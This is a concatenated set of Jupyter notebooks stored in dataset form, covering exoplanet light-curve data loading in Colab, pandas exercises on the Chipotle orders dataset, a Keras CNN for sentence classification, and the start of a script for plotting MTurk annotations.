uncertainties->lightkurve) (0.16.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->lightkurve) (2.8.1)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->lightkurve) (2018.9)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (0.10.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (1.2.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (2.4.7)\nRequirement already satisfied: autograd in /usr/local/lib/python3.6/dist-packages (from oktopus->lightkurve) (1.3)\nCollecting jeepney>=0.4.2; sys_platform == \"linux\"\n Downloading https://files.pythonhosted.org/packages/79/31/2e8d42727595faf224c6dbb748c32b192e212f25495fe841fb7ce8e168b8/jeepney-0.4.3-py3-none-any.whl\nCollecting SecretStorage>=3; sys_platform == \"linux\"\n Downloading https://files.pythonhosted.org/packages/c3/50/8a02cad020e949e6d7105f5f4530d41e3febcaa5b73f8f2148aacb3aeba5/SecretStorage-3.1.2-py3-none-any.whl\nRequirement already satisfied: importlib-metadata; python_version < \"3.8\" in /usr/local/lib/python3.6/dist-packages (from keyring>=4.0->astroquery>=0.3.9->lightkurve) (2.0.0)\nRequirement already satisfied: webencodings in /usr/local/lib/python3.6/dist-packages (from html5lib>=0.999->astroquery>=0.3.9->lightkurve) (0.5.1)\nCollecting cryptography\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/33/62/30f6936941d87a5ed72efb24249437824f6b2c953901245b58c91fde2f27/cryptography-3.1.1-cp35-abi3-manylinux2010_x86_64.whl (2.6MB)\n\u001b[K |████████████████████████████████| 2.6MB 38.8MB/s \n\u001b[?25hRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.6/dist-packages (from importlib-metadata; python_version < \"3.8\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (3.2.0)\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/local/lib/python3.6/dist-packages (from cryptography->SecretStorage>=3; sys_platform == \"linux\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (1.14.3)\nRequirement already satisfied: pycparser in /usr/local/lib/python3.6/dist-packages (from cffi!=1.11.3,>=1.8->cryptography->SecretStorage>=3; sys_platform == \"linux\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (2.20)\nBuilding wheels for collected packages: astroquery, fbpca, oktopus\n Building wheel for astroquery (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for astroquery: filename=astroquery-0.4.1-cp36-none-any.whl size=3831873 sha256=706641e0976ba9ffd7c961cc24cb51a7d02d4a81fbafcba7cdca66f230532b1d\n Stored in directory: /root/.cache/pip/wheels/88/f8/b7/a254cd96e808f708bc0b7d755a8e095c56fbbe94099d7b464f\n Building wheel for fbpca (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for fbpca: filename=fbpca-1.0-cp36-none-any.whl size=11376 sha256=9b5d900a1c150e09af098fdf8d9ba71e1aa6f4ae480cb64b4a40f146486b8fd6\n Stored in directory: /root/.cache/pip/wheels/53/a2/dd/9b66cf53dbc58cec1e613d216689e5fa946d3e7805c30f60dc\n Building wheel for oktopus (setup.py) ... 
\u001b[?25l\u001b[?25hdone\n Created wheel for oktopus: filename=oktopus-0.1.2-cp36-none-any.whl size=12781 sha256=0f0a58ce0c990c713be0d6b8c0796a42bfaf3fe5bfe41ea94187eb2c9e74470b\n Stored in directory: /root/.cache/pip/wheels/9b/90/81/098fc66ee56166d63c9a8fc0a9672ae7b3423396a588ec952a\nSuccessfully built astroquery fbpca oktopus\n\u001b[31mERROR: tensorflow 2.3.0 has requirement scipy==1.4.1, but you'll have scipy 1.5.2 which is incompatible.\u001b[0m\n\u001b[31mERROR: albumentations 0.1.12 has requirement imgaug<0.2.7,>=0.2.5, but you'll have imgaug 0.2.9 which is incompatible.\u001b[0m\nInstalling collected packages: jeepney, cryptography, SecretStorage, keyring, astroquery, uncertainties, fbpca, scipy, oktopus, lightkurve\n Found existing installation: scipy 1.4.1\n Uninstalling scipy-1.4.1:\n Successfully uninstalled scipy-1.4.1\nSuccessfully installed SecretStorage-3.1.2 astroquery-0.4.1 cryptography-3.1.1 fbpca-1.0 jeepney-0.4.3 keyring-21.4.0 lightkurve-1.11.3 oktopus-0.1.2 scipy-1.5.2 uncertainties-3.1.4\n"
],
[
"# now we can open each data file, here are some examples:\n## NOTICE: for the path I do NOT use the \"\\\" in My\\ Drive\" like we did for the terminal commands above\n\n# for .csv files\ndata_1 = pd.read_csv('/content/gdrive/My Drive/EscapeEarthData/2161623_lc.csv') \n# for .npy files\ndata_2 = np.load('/content/gdrive/My Drive/EscapeEarthData/bls_powers.npy')\n# let's see the data\nprint('Data-1 Example:',data_1)\nprint('Data-2 Example:',data_2)",
"Data-1 Example: # bjd\\tphase\\traw_flux\\traw_err\\tcorr_flux\\tcorr_err\\tdtr_flux\\tdtr_err\n0 56107.16069599\\t0.03416000\\t0.593396\\t0.000242... \n1 56107.18113035\\t0.04310882\\t0.745326\\t0.000245... \n2 56107.20156461\\t0.05205760\\t0.871438\\t0.000247... \n3 56107.22199908\\t0.06100646\\t0.960180\\t0.000249... \n4 56107.24243344\\t0.06995528\\t0.994236\\t0.000252... \n... ... \n8631 56304.05439858\\t0.25982505\\t1.050795\\t0.000264... \n8632 56304.07483160\\t0.26877329\\t1.050991\\t0.000264... \n8633 56304.09526452\\t0.27772148\\t1.051052\\t0.000264... \n8634 56304.11569744\\t0.28666967\\t1.050454\\t0.000264... \n8635 56304.13613036\\t0.29561785\\t1.050061\\t0.000264... \n\n[8636 rows x 1 columns]\nData-2 Example: [34615 294 12 ... 43420 32493 4189]\n"
],
[
"# Data-1 Example's format isn't a typical dataframe so let's try this\ndata_1",
"_____no_output_____"
],
[
"# that looks better but we still only have one column \n# - let's use input arguments to fix the formatting\n\n#notice I'm rewriting the variable too\ndata_1 = pd.read_csv('/content/gdrive/My Drive/EscapeEarthData/2161623_lc.csv',header=0,delimiter ='\t')\ndata_1",
"_____no_output_____"
],
[
"# Here's another trick \n# our path to the shared folder is long and we may not want to type it everytime\n# we can save the path and insert it as shown below\n\nmypath = '/content/gdrive/My Drive/EscapeEarthData'\n\n#let's open yet another data file\ndata_3 = np.load('{}/bls_powers.npy'.format(mypath))\nprint('Data-3 Example:',data_3)",
"Data-3 Example: [34615 294 12 ... 43420 32493 4189]\n"
]
],
[
[
"# __How to Save NEW data to our shared folder__\n#### _Important Note_: when saving new data always name the file with a clear name followed by '-YourName'. And similar to how you opened data, you MUST enter the full path as shown in the cell directly above as the variable mypath and include an necessary subdirectories. I will then resave the new file within my google drive that has unlimited storage, whereas yours will not.\n#### FOR EXAMPLE: Using data_3's filename, you would save it as \"/content/gdrive/My Drive/EscapeEarthData/bls_powers-Danielle.npy\". ",
"_____no_output_____"
]
],
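[
[
"For example, a minimal save that follows the convention above (replace `YourName` with your own name; `data_3` is simply the array we opened earlier):\n\n```\nnp.save('{}/bls_powers-YourName.npy'.format(mypath), data_3)\n```",
"_____no_output_____"
]
],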
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707000cb62c9d4d8d7efa6aeaeffe85044dfc64 | 50,370 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 37.228381 | 733 | 0.378757 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\n",
"_____no_output_____"
]
],
[
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
]
],
[
[
"chipo= pd.read_csv('https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv',\"\\t\")",
"/usr/local/lib/python3.7/dist-packages/IPython/core/interactiveshell.py:2882: FutureWarning: In a future version of pandas all arguments of read_csv except for the argument 'filepath_or_buffer' will be keyword-only\n exec(code_obj, self.user_global_ns, self.user_ns)\n"
]
],
[
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
]
],
[
[
"chipo.head(10)",
"_____no_output_____"
]
],
[
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"chipo.info()\n#chipo.count()\n\n\n\n\n",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 4622 entries, 0 to 4621\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 order_id 4622 non-null int64 \n 1 quantity 4622 non-null int64 \n 2 item_name 4622 non-null object\n 3 choice_description 3376 non-null object\n 4 item_price 4622 non-null object\ndtypes: int64(2), object(3)\nmemory usage: 180.7+ KB\n"
],
[
"# Solution 2\nchipo.shape\n",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
]
],
[
[
"chipo.shape\n#len(chipo.columns)",
"_____no_output_____"
]
],
[
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
]
],
[
[
"chipo.columns",
"_____no_output_____"
]
],
[
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
]
],
[
[
"chipo.index",
"_____no_output_____"
]
],
[
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
]
],
[
[
"#chipo['item_name'].value_counts().head(1)\nitem_quants=chipo.groupby([\"item_name\"]).agg({\"quantity\":'sum'})\nitem_quants.sort_values(\"quantity\",ascending=False)[:1]",
"_____no_output_____"
]
],
[
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
]
],
[
[
"chipo.groupby(\"item_name\").sum().sort_values('quantity',ascending=False).head(1)\n",
"_____no_output_____"
]
],
[
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
]
],
[
[
"#chipo['choice_description'].value_counts().head(1)\nitem_quants=chipo.groupby([\"choice_description\"]).agg({\"quantity\":'sum'})\nitem_quants.sort_values(\"quantity\",ascending=False)[:5]",
"_____no_output_____"
]
],
[
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
]
],
[
[
"chipo.quantity.count()\n",
"_____no_output_____"
]
],
[
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
]
],
[
[
"chipo['item_price']= chipo.item_price.str.slice(1).astype(float)\nchipo.info",
"_____no_output_____"
]
],
[
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
]
],
[
[
"chipo['item_price'].dtypes",
"_____no_output_____"
]
],
[
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
]
],
[
[
"chipo[\"item_price\"].apply(lambda x: [int(x) if x is type(float)])\n#lambda x: int(x) if isinstance(x, float) else x\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
]
],
[
[
"chipo['item_price'].dtypes",
"_____no_output_____"
]
],
[
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
]
],
[
[
"\n",
"_____no_output_____"
]
],
[
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70701ee78015b09c1e778812a187e4a7ded90c1 | 16,663 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 22.888736 | 135 | 0.413791 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
]
],
[
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv('https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv', sep = \"\\t\")",
"_____no_output_____"
]
],
[
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
]
],
[
[
"data.head(10)",
"_____no_output_____"
]
],
[
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"# Solution 1\ndata.shape[0]\n",
"_____no_output_____"
],
[
"# Solution 2\nlen(data)",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
]
],
[
[
"data.shape[1]",
"_____no_output_____"
]
],
[
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
]
],
[
[
"print(\", \".join(data.columns))",
"order_id, quantity, item_name, choice_description, item_price\n"
]
],
[
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
]
],
[
[
"data.index",
"_____no_output_____"
]
],
[
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
]
],
[
[
"data.groupby('item_name').sum().nlargest(1,'quantity')",
"_____no_output_____"
]
],
[
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
]
],
[
[
"data.nlargest(1,'quantity')['quantity']",
"_____no_output_____"
]
],
[
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
]
],
[
[
"# slicing operator, so that the result is a series, hence keeps its index\ndata['choice_description'].value_counts()[0:1] ",
"_____no_output_____"
]
],
[
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
]
],
[
[
"data['quantity'].sum()",
"_____no_output_____"
]
],
[
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
],
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
]
],
[
[
"data['item_price'].dtype",
"_____no_output_____"
]
],
[
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
]
],
[
[
"data['item_price'] = data['item_price'].apply(lambda item_price: float(item_price.strip(\"$\")))",
"_____no_output_____"
]
],
[
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
]
],
[
[
"data.dtypes",
"_____no_output_____"
]
],
[
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
]
],
[
[
"(data['item_price'] * data['quantity']).sum()",
"_____no_output_____"
]
],
[
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
]
],
[
[
"data['order_id'].nunique()",
"_____no_output_____"
]
],
[
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n(data['item_price'] * data['quantity']).sum() / data['order_id'].nunique()",
"_____no_output_____"
],
[
"# Solution 2\ndata.groupby('order_id').apply(lambda _order : (_order['item_price'] * _order['quantity']).sum()).mean()",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
],
[
[
"data['item_name'].nunique()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70710be5fde4dfa449b8e2772bec087b5f5f2f4 | 99,886 | ipynb | Jupyter Notebook | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | 7 | 2020-07-20T06:38:29.000Z | 2022-01-25T07:51:08.000Z | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | null | null | null | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | 4 | 2019-10-09T09:44:53.000Z | 2020-12-07T14:31:21.000Z | 244.818627 | 42,372 | 0.90317 | [
[
[
"from CNN import tCNN",
"_____no_output_____"
]
],
[
[
"## Getting Data ",
"_____no_output_____"
]
],
[
[
"import pickle\nwith open('Data_sirAurobindo.pkl', 'rb') as f:\n Final = pickle.load(f)\n \nX = Final[0]\nY = Final[1]",
"_____no_output_____"
]
],
[
[
"## Random Shuffle",
"_____no_output_____"
]
],
[
[
"import random\n\nXY = list(zip(X, Y))\nrandom.shuffle(XY)\n\nX, Y = zip(*XY)",
"_____no_output_____"
],
[
"len(X)",
"_____no_output_____"
],
[
"tCNN()\n\n\nfrom keras.utils import plot_model\nfrom IPython.display import Image\nfrom keras.models import load_model\n\nmodel = load_model('CNN_model_init.h5')\nplot_model(model, to_file='CNN_arch.png')\nImage(filename='./CNN_arch.png')",
"__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) (None, 10, 10, 1) 0 \n__________________________________________________________________________________________________\nzero_padding2d_4 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nzero_padding2d_5 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nzero_padding2d_6 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_4[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_5[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_6[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_7 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_4[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_8 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_5[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_9 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_6[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_10 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_7[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_11 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_8[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_12 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_9[0][0] \n__________________________________________________________________________________________________\nconcatenate_2 (Concatenate) (None, 27, 9, 64) 0 max_pooling2d_10[0][0] \n max_pooling2d_11[0][0] \n max_pooling2d_12[0][0] \n__________________________________________________________________________________________________\nflatten_2 (Flatten) (None, 15552) 0 concatenate_2[0][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 6) 93318 flatten_2[0][0] \n==================================================================================================\nTotal params: 95,238\nTrainable params: 95,238\nNon-trainable params: 0\n__________________________________________________________________________________________________\nModel Saved!\n"
]
],
[
[
"## Reshaping Array",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\nX = np.asarray(X)\nY = np.asarray(Y)\n\nX = X.reshape(X.shape[0], X.shape[1], X.shape[2], 1)\nY = Y.reshape(Y.shape[0], 1)\n\nprint(f\"X shape : {X.shape}\\nY shape : {Y.shape}\")",
"X shape : (141, 10, 10, 1)\nY shape : (141, 1)\n"
],
[
"x_train = X[0:100]\ny_train = Y[0:100]\n\nx_test = X[100:]\ny_test = Y[100:]",
"_____no_output_____"
]
],
[
[
"## Training Model",
"_____no_output_____"
]
],
[
[
"# callback function\nimport keras\nimport matplotlib.pyplot as plt\n\nclass myCallback(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('acc')>0.90):\n print(\"\\nReached 90% accuracy so cancelling training!\")\n self.model.stop_training = True\n \ncallback = myCallback()\n\nhistory = model.fit(x_train, y_train,\n epochs=1000,\n verbose=1,\n validation_data=(x_test, y_test),\n callbacks=[callback])\n\ntry:\n model.save('CNN_model_sirAurobindo.h5')\n print(\"Model Saved!\")\nexcept:\n print(\"Error in saving Model\")",
"Train on 100 samples, validate on 41 samples\nEpoch 1/1000\n100/100 [==============================] - 1s 15ms/step - loss: 5.4300 - acc: 0.2200 - val_loss: 3.6067 - val_acc: 0.3659\nEpoch 2/1000\n100/100 [==============================] - 0s 1ms/step - loss: 4.1958 - acc: 0.1700 - val_loss: 3.3285 - val_acc: 0.2927\nEpoch 3/1000\n100/100 [==============================] - 0s 1ms/step - loss: 3.3507 - acc: 0.2100 - val_loss: 2.4355 - val_acc: 0.4878\nEpoch 4/1000\n100/100 [==============================] - 0s 1ms/step - loss: 2.3192 - acc: 0.3100 - val_loss: 2.1371 - val_acc: 0.2195\nEpoch 5/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.9823 - acc: 0.2700 - val_loss: 2.0280 - val_acc: 0.3659\nEpoch 6/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.8946 - acc: 0.4300 - val_loss: 1.3595 - val_acc: 0.6829\nEpoch 7/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.4568 - acc: 0.4800 - val_loss: 1.3844 - val_acc: 0.4878\nEpoch 8/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.4409 - acc: 0.5500 - val_loss: 1.5604 - val_acc: 0.3659\nEpoch 9/1000\n100/100 [==============================] - 0s 975us/step - loss: 1.0690 - acc: 0.5500 - val_loss: 0.9641 - val_acc: 0.7317\nEpoch 10/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.0512 - acc: 0.6900 - val_loss: 0.7967 - val_acc: 0.8049\nEpoch 11/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.6914 - acc: 0.7700 - val_loss: 0.8931 - val_acc: 0.6341\nEpoch 12/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.6997 - acc: 0.7800 - val_loss: 0.4875 - val_acc: 0.8293\nEpoch 13/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3976 - acc: 0.9000 - val_loss: 0.6189 - val_acc: 0.8293\nEpoch 14/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.5484 - acc: 0.8200 - val_loss: 0.3110 - val_acc: 0.9756\nEpoch 15/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3573 - acc: 0.8800 - val_loss: 0.4086 - val_acc: 0.9512\nEpoch 16/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3052 - acc: 0.9200 - val_loss: 0.4550 - val_acc: 0.8293\n\nReached 90% accuracy so cancelling training!\nModel Saved!\n"
]
],
[
[
"## Plotting Model Accuracy and Loss",
"_____no_output_____"
]
],
[
[
"# Plot training & validation accuracy values\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.savefig('Model_accuracy_sirAurobindo.png', bbox_inches='tight')\nplt.show()\n\n# Plot training & validation loss values\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.savefig('Model_loss_sirAurobindo.png', bbox_inches='tight')",
"_____no_output_____"
],
[
"score = model.evaluate(x_test, y_test, verbose=0)\nscore",
"_____no_output_____"
],
[
"max(y_test)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e7071a9266f06e1bff6915601044f281810878e6 | 20,086 | ipynb | Jupyter Notebook | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | 31.237947 | 171 | 0.48835 | [
[
[
"### This script is for generating crop slices from main image rather than the images workers see and marked. \n### So output images show the worker annotations for object locations.",
"_____no_output_____"
]
],
[
[
"from PIL import Image,ImageDraw\nimport json\nimport numpy as np\nfrom matplotlib import pyplot as plt\n%matplotlib inline\nimport matplotlib.image as mpimg\nfrom math import floor\n\nfrom urllib.parse import urlparse\nimport urllib.request, json\nimport requests\nfrom io import BytesIO\nimport os\nImage.MAX_IMAGE_PIXELS = None\n\nimport boto3\nimport datetime\nimport json\nimport pandas as pd\nimport os\nfrom pathlib import Path",
"_____no_output_____"
]
],
[
[
"### Crop corner images that may location annotations towards corners or edges of main image.",
"_____no_output_____"
]
],
[
[
